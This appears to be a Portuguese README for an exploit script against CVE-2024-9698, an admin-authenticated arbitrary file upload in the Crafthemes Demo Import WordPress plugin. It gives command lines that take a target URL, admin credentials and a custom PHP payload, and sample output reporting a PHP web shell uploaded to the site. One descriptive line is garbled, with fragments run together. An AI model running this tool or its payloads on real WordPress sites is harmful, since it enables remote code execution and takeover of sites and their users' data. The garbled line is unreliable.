
Crafthemes Demo Import <= 3.3 - Upload Arbitrário de Arquivos Autenticado (Admin+) em process_uploaded_files
Este exploit ataca uma vulnerabilidade crítica (CVE-2024-9698) no plugin Crafthemes Demo Import para WordPress. A vulnerabilidade permite que administradores autenticados enviem arquivos arbitrários para o site WordPress afetado, levando a uma potencial execução remota de código (RCE).
process_uploaded_filesreadme.txt.admin-ajax.php para enviar um shell PHP personalizado.python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password"
Se quiser enviar um payload PHP personalizado, use:
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password" --payload "<?php phpinfo(); ?>"
[+] Target is vulnerable, proceeding with exploit...
[+] Logged in successfully.
[+] Extracted nonce: abc123xyz
[+] Shell uploaded successfully: http://target.com/wp-content/uploads/2025/02/Nxploit.php
Aviso Legal: Este script destina-se apenas a fins educacionais e de pesquisa em segurança. O uso não autorizado contra sistemas sem permissão explícita é ilegal.